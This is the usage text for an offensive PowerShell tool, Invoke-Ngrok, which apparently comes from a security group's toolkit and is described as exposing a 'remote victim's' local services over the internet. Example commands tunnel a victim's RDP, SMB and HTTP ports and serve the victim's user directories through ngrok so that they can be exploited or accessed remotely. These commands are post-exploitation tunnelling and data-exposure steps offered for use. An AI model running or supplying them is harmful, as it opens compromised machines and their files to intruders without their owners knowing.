Expose local port of a remote victim over Internet. Use it to exploit or access local service remotely without public IP (RDP, SQL, SSH, SMB, FTP ...)
Help: Parameters: -auth : Your Ngrok API, go to ngrok dashborad to retreive it -tcp : The protocol used by the service you want to expose remotely (tcp/http) -port : The port used by the service you want to expose remotely -custom : Customie ngrok parameters you want to execute -fileserver : Serve local file system over Internet example:
Invoke-Ngrok -auth xxxxxxxxx -protocol tcp -port 3389 # Expose RDP session over Internet
Invoke-Ngrok -auth xxxxxxxxx -protocol tcp -port 445 # Expose SMB port over Internet
Invoke-Ngrok -auth xxxxxxxxx -protocol http -port 80 # Expose HTTP port over Internet
Invoke-Ngrok -auth xxxxxxxxx -fileserver "C:\Users\alan" # Expose local file system directories over internet
Invoke-Ngrok -custom "http -region=us -hostname=dev.example.com 8000" #Custom ngrok command you want to execute.
Author: @ThebenyGreen
- EyesOpenSecurity
Credits - inconshreveable - [email protected]